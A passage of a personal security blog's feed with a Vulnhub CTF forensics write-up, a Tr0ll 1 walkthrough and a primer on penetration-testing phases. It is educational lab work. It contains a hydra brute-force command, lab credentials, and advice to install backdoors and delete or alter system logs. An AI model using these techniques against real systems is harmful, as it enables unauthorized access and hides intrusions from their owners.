 security-system.data: Zip archive data, at least v2.0 to extract

barryallen@skydogconctf2016:~$ unzip security-system.data
 Archive: security-system.data
 replace security-system.data? [y]es, [n]o, [A]ll, [N]one, [r]ename: r
 new name: data
 inflating: data

barryallen@skydogconctf2016:~$ ls
 data flag.txt security-system.data
</code></pre></div></div>

<h4 id="copied-the-extracted-file-from-barryallen-to-local-machine">Copied the extracted file from barryallen to local machine</h4>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kaipowered@debian:~/Documents/Vulnhub/skydogctf$ scp -P 22222 barryallen@192.168.56.102:/home/barryallen/data ~/Documents/Vulnhub/skydogctf
 ###############################################################
 # WARNING #
 # FBI - Authorized access only! #
 # Disconnect IMMEDIATELY if you are not an authorized user!!! #
 # All actions Will be monitored and recorded #
 # Flag{53c82eba31f6d416f331de9162ebe997} #
 ###############################################################
 barryallen@192.168.56.102's password:
 data 100% 1024MB 40.1MB/s 00:25
 kaipowered@debian:~/Documents/Vulnhub/skydogctf$

kaipowered@debian:~/Documents/Vulnhub/skydogctf$ volatility imageinfo -f data
 Volatility Foundation Volatility Framework 2.6
 INFO : volatility.debug : Determining profile based on KDBG search...
 Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
 AS Layer1 : IA32PagedMemoryPae (Kernel AS)
 AS Layer2 : FileAddressSpace (/home/kaipowered/Documents/Vulnhub/skydogctf/tmp/data)
 PAE type : PAE
 DTB : 0x33e000L
 KDBG : 0x80545b60L
 Number of Processors : 1
 Image Type (Service Pack) : 3
 KPCR for CPU 0 : 0xffdff000L
 KUSER_SHARED_DATA : 0xffdf0000L
 Image date and time : 2016-10-10 22:00:50 UTC+0000
 Image local date and time : 2016-10-10 18:00:50 -0400

kaipowered@debian:~/Documents/Vulnhub/skydogctf$ volatility --profile=WinXPSP2x86 -f data filescan &gt; datafile
 Volatility Foundation Volatility Framework 2.6

kaipowered@debian:~/Documents/Vulnhub/skydogctf$ cat datafile | grep flag
 kaipowered@debian:~/Documents/Vulnhub/skydogctf$ cat datafile | grep txt
 0x0000000005e612f8 1 0 -W-r-- \Device\HarddiskVolume1\Documents and Settings\test\Desktop\code.txt
 0x000000000629fc08 1 0 R--rw- \Device\HarddiskVolume1\Program Files\VMware\VMware Tools\vmacthlp.txt
 0x00000000062c4620 1 0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\adobephotoshopcs3.txt
 0x00000000062c4be8 1 0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\adobeflashcs3.txt
 0x00000000062e04b0 1 0 R--r-d \Device\HarddiskVolume1\Documents and Settings\test\Recent\code.txt.lnk
 0x00000000063b4428 1 0 R--r-- \Device\HarddiskVolume1\System Volume Information\_restore{FA371F61-4781-4A7F-99F2-B979D68F9988}\drivetable.txt
 0x0000000006503e60 4 2 -W-rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware VGAuth\logfile.txt.0
 0x000000000663d4c0 1 0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\win7gadgets.txt
 0x000000000663d6b8 1 0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\vmwarefilters.txt
 0x000000000663d8b0 1 0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\visualstudio2005.txt
 0x000000000663daa8 1 0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\vistasidebar.txt
 0x000000000663dca0 1 0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\microsoftoffice.txt
 0x000000000663de98 1 0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\googledesktop.txt
 0x000000000663f970 1 0 R--rwd \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\manifest.txt
 0x0000000006640bc8 1 0 R--rwd \Device\HarddiskVolume1\Documents and Settings\test\Desktop\code.txt

kaipowered@debian:~/Documents/Vulnhub/skydogctf$ volatility --profile=WinXPSP2x86 -f data cmdscan
 Volatility Foundation Volatility Framework 2.6
 **************************************************
 CommandProcess: csrss.exe Pid: 560
 CommandHistory: 0x10186f8 Application: cmd.exe Flags: Allocated, Reset
 CommandCount: 2 LastAdded: 1 LastDisplayed: 1
 FirstCommand: 0 CommandCountMax: 50
 ProcessHandle: 0x2d4
 Cmd #0 @ 0x1024400: cd Desktop
 Cmd #1 @ 0x4f2660: echo 66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d &gt; code.txt
 kaipowered@debian:~/Documents/Vulnhub/skydogctf$
</code></pre></div></div>

<p>Convert the hex to ascii.</p>

<p>http://www.rapidtables.com/convert/number/hex-to-ascii.htm</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d
</code></pre></div></div>

<p>Result: flag{841dd3db29b0fbbd89c7b5be768cdc81}</p>

<p>Decoded MD5 Hash: Two little mice</p>

<p>After I got the last flag and the decoded md5 hash, I googled the “Two little mice” and found the quote by Frank Abagnale Sr.</p>

<p><em><a href="https://www.imdb.com/name/nm0000686/?ref_=tt_trv_qu">Frank Abagnale Sr.</a>: Two little mice fell in a bucket of cream. The first mouse quickly gave up and drowned. The second mouse, wouldn’t quit. He struggled so hard that eventually he churned that cream into butter and crawled out. Gentlemen, as of this moment, I am that second mouse.</em></p>

<p>The quote of Frank made me goosebumps and I was really satisfied after I finished this CTF challenge. It was quite challenging and I really had fun!</p>]]></content><author><name>[&quot;anotsodev&quot;]</name></author><summary type="html"><![CDATA[The SkyDogConCTF is one of the most enjoyable CTF challenges that I have ever played because it contained a lot of twists and challenges that don’t need advanced exploitation techniques …]]></summary></entry><entry><title type="html">Vulnhub Tr0ll 1</title><link href="https://blog.anotsodev.me/2017/08/25/vulnhub-tr0ll-1.html" rel="alternate" type="text/html" title="Vulnhub Tr0ll 1" /><published>2017-08-25T00:00:00+00:00</published><updated>2017-08-25T00:00:00+00:00</updated><id>https://blog.anotsodev.me/2017/08/25/vulnhub-tr0ll-1</id><content type="html" xml:base="https://blog.anotsodev.me/2017/08/25/vulnhub-tr0ll-1.html"><![CDATA[<p>Started with the Nmap Scan</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Nmap 7.40 scan initiated Thu Aug  3 20:58:47 2017 as: nmap -sC -sV -oA nmap 192.168.8.102
Nmap scan report for 192.168.8.102
Host is up (0.0035s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_  256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug  3 20:59:07 2017 -- 1 IP address (1 host up) scanned in 19.95 seconds
</code></pre></div></div>
<ul>
  <li>port 21</li>
  <li>port 22</li>
  <li>port 80</li>
</ul>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot-from-2017-08-07-14-59-21-e1503681890612.png?resize=734%2C585&amp;ssl=1" alt="screenshot-from-2017-08-07-14-59-21-e1503681730435.png" /></p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot20from202017-08-072015-02-06-e1503681876965.png?resize=656%2C296&amp;ssl=1" alt="screenshot20from202017-08-072015-02-06.png" /></p>

<p>There is a directory in the web server named secret. So I opened the /secret directory and it showed me this.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot20from202017-08-072015-03-20-e1503682119899.png?resize=745%2C650&amp;ssl=1" alt="screenshot20from202017-08-072015-03-20.png" /></p>

<p>And yes, it made me mad after seeing this.</p>

<p>Continuing my enumeration, I saw that the FTP server allows anonymous login, so I fired up my Filezilla and browse the FTP server. There is a file there named lol.pcap. Pcap is a file that contains the captured network traffics from network analyzers such as Wireshark and some other tools. So to open the pcap file, I launched Wireshark and read the pcap file. It showed me this.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot20from202017-08-032021-37-00-e1503710304210.png?resize=1170%2C610&amp;ssl=1" alt="screenshot20from202017-08-032021-37-00-e1503682196980.png" /></p>

<p>I noticed the “sup3rs3cr3tdirlol” and tried to open it and voila.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot20from202017-08-072015-13-36-e1503682263987.png?resize=548%2C388&amp;ssl=1" alt="screenshot20from202017-08-072015-13-36.png" /></p>

<p>I downloaded the file named roflmao then run the file command to determine the filetype of the downloaded file. It shows that it is an ELF 32-bit LSB executable.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kaipowered@debian:~/Documents/Vulnhub/tr0ll$ file roflmao 
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped
</code></pre></div></div>

<p>So the next thing I did was to run the gdb then run the executable file.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GNU gdb (Debian 7.12-6) 7.12.0.20161007-git
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt;
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
&lt;http://www.gnu.org/software/gdb/bugs/&gt;.
Find the GDB manual and other documentation resources online at:
&lt;http://www.gnu.org/software/gdb/documentation/&gt;.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from roflmao...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/kaipowered/Documents/Vulnhub/tr0ll/roflmao 
Find address 0x0856BF to proceed[Inferior 1 (process 10058) exited with code 040]
(gdb)
</code></pre></div></div>

<p>The output showed me this</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Find address 0x0856BF to proceed[Inferior 1 (process 10058) exited with code 040]
</code></pre></div></div>

<p>I tried to find the said address but I wasn’t able to find it in the memory, so I tried opening it on the web browser and it appears that it is a directory on the web server (luck I guess).</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2017/08/screenshot20from202017-08-072015-24-34-e1503682433212.png?resize=659%2C390&amp;ssl=1" alt="screenshot20from202017-08-072015-24-34" /></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>hydra -L which_one_lol.txt -P Pass.txt 192.168.8.102
</code></pre></div></div>

<p>At first, the usernames and passwords combination did not work, so it was so frustrating.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>hydra -L which_one_lol.txt -p Pass.txt 192.168.8.102
</code></pre></div></div>

<p>But it appears that the real password is the “Pass.txt”, so I just changed the option from -P to -p, meaning, with the given password, try the usernames from which_one_lol.txt to match the correct combinations with hydra.</p>

<p>After bruteforcing, I was able to get the username and password of the machine.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>username: overflow
password: Pass.txt
</code></pre></div></div>

<p>Commands Used</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kaipowered@debian:~/Documents/Vulnhub/tr0ll$ ssh overflow@192.168.8.102
overflow@192.168.8.102's password: 
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Sun Aug  6 23:35:25 2017 from 192.168.8.2
Could not chdir to home directory /home/overflow: No such file or directory
$
</code></pre></div></div>

<p>https://www.exploit-db.com/exploits/37292/</p>

<p>And after successfully exploited the tr0ll vm, I was able to get and read the Proof.txt that can be found in /root directory.</p>

<p>— FIN —</p>

<p>Solving this challenge was quite frustrating at first because, you know, the tr0ll is trolling you, but most of the time, when I found something interesting and it just appeared that I have been tr0lled, I just found myself grinning while clenching my fists, but of course I enjoyed solving this challenge.</p>]]></content><author><name>[&quot;anotsodev&quot;]</name></author><summary type="html"><![CDATA[Started with the Nmap Scan # Nmap 7.40 scan initiated Thu Aug 3 20:58:47 2017 as: nmap -sC -sV -oA nmap 192.168.8.102 Nmap scan report for 192.168.8.102 Host is up (0.0035s latency). Not shown: 997…]]></summary></entry><entry><title type="html">Phases of Penetration Testing</title><link href="https://blog.anotsodev.me/2017/08/24/phases-of-penetration-testing.html" rel="alternate" type="text/html" title="Phases of Penetration Testing" /><published>2017-08-24T00:00:00+00:00</published><updated>2017-08-24T00:00:00+00:00</updated><id>https://blog.anotsodev.me/2017/08/24/phases-of-penetration-testing</id><content type="html" xml:base="https://blog.anotsodev.me/2017/08/24/phases-of-penetration-testing.html"><![CDATA[<p>Penetration Testing or Pentesting is a process where the testers will assess and discover the vulnerabilities that are present in a network or system and will exploit these vulnerabilities to gain access. Pentesting is also the process of simulating real world scenario where the testers will act and think like an attacker to assess and discover weaknesses and exploit those weaknesses of the target system.</p>

<p>There are a lot of topics in penetration testing but I will only discuss the phases and techniques that I usually use when I am attacking a vulnerable system.</p>

<p>In general, the phases of penetration testing are</p>

<ol>
  <li>Reconnaissance</li>
  <li>Scanning</li>
  <li>Gaining Access</li>
  <li>Maintaining Access</li>
  <li>Covering Tracks</li>
</ol>

<p>Before attacking our target system, we always need to plan our moves to get a higher chance of gaining access to the system.</p>

<h2 id="reconnaissance">Reconnaissance</h2>

<p>So first is the Reconnaissance. Reconnaissance is the phase where we gather available information of the target with the use of search engines and/or social media sites. There are two types of reconnaissance, the passive reconnaissance, and active reconnaissance.</p>

<p><strong>Passive reconnaissance</strong> is the gathering of information on Google, company profile, social media, name servers, etc.</p>

<p><strong>Active reconnaissance</strong> is the gathering of information through scanning the target system with the use of tools that are available and can be downloaded online.</p>

<p>Beware of the IDS/IPS and Firewall when scanning because we are most likely will fail if the target system blocked our access.</p>

<p>Tools for <strong>active reconnaissance</strong></p>

<ul>
  <li>nmap</li>
  <li>maltego</li>
  <li>etc.</li>
</ul>

<p>The goal of this phase is to gather the initial information of the target.</p>

<h2 id="scanning">Scanning</h2>

<p>After we gather the available information of the target, we will scan the target system to discover vulnerabilities that are present for us to exploit.</p>

<p>Tools for scanning</p>

<ul>
  <li>nmap</li>
  <li>auxiliary modules in metasploit</li>
  <li>etc.</li>
</ul>

<p>Again, beware of the IDS/IPS and Firewall when scanning.</p>

<p>The goal of this phase is to have an idea on how we can exploit the vulnerabilities that are present on the target system. For example, if the target system is vulnerable to a certain exploit that is available in public, we can add this to our options in exploiting the target system.</p>

<h2 id="gaining-access">Gaining Access</h2>

<p>After enumerating our target, we will now move on to the fun part in hacking; the exploitation phase.</p>

<ul>
  <li>Proper enumeration can lead to more chance of exploitation.</li>
  <li>You can use public exploits to attack the vulnerable services that are present on the target’s local machine.</li>
  <li>Public exploits may not work out of the box so you need to analyze how the exploit works by tracing the source code of the exploit.</li>
  <li>Modify the source code of the exploit if you need to.</li>
  <li>In compiling public exploits locally, make sure that it matches the kernel version of the local machine to the target machine.</li>
</ul>

<p>The goal of this phase is to properly exploit the vulnerabilities of the target and gain low-level or privileged access to the system.</p>

<h2 id="maintaining-access">Maintaining Access</h2>

<p>When we successfully exploited and got a low privileged access to the system, we need to maintain our access long enough to achieve our goal.</p>

<ul>
  <li>If you have gained access to the system, you may install a backdoor in the case of the user reboots the target machine</li>
  <li>Since you only have an initial access to the system (low privileged access), enumerate for the available programs, weak credentials, default passwords, and others that may be used to escalate your privileges.</li>
  <li>Check for the versions of the available services that are present on the target’s local machine</li>
  <li>You can use automated scripts to automate the enumeration process</li>
  <li>
    <ul>
      <li><strong>Linux Privilege Escalation Enumeration Scripts</strong>
    - unix-privesc-check – <a href="http://pentestmonkey.net/tools/audit/unix-privesc-check">http://pentestmonkey.net/tools/audit/unix-privesc-check</a>
    - linuxprivchecker.py – <a href="https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123">https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123</a>
    - linenum – <a href="https://www.rebootuser.com/?p=1758">https://www.rebootuser.com/?p=1758</a>
    - linux-local-enumeration-script.sh – <a href="https://highon.coffee/blog/linux-local-enumeration-script/">https://highon.coffee/blog/linux-local-enumeration-script/</a>
    - Basic Linux Priv Escalation(blog post) – <a href="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/">https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/</a></li>
    </ul>
  </li>
</ul>

<p>The goal of this phase is to maintain and gain system level access to the system.</p>

<h2 id="covering-tracks">Covering Tracks</h2>

<p>After we have gained access to the system and we already achieved our goal, we need to delete all the backdoors, exploits, and other files that we used to gain access to the system. We also need to delete or modify the system logs to cover our tracks.</p>

<p>The goal of this phase is self-explanatory.</p>

<h2 id="conclusion">Conclusion</h2>

<p>So there are five phases of penetration testing and these are Reconnaissance, Scanning, Gaining Access, Maintaining Access, and Covering Tracks. There are still a lot of information that wasn’t included here and I hope it gave you an idea and understand the phases and techniques on how the penetration testers attack a system.</p>

<p>If you have any questions or suggestions, feel free to contact me. 🙂</p>]]></content><author><name>[&quot;anotsodev&quot;]</name></author><summary type="html"><![CDATA[Penetration Testing or Pentesting is a process where the testers will assess and discover the vulnerabilities that are present in a network or system and will exploit these vulnerabilities to gain …]]></summary></entry></feed>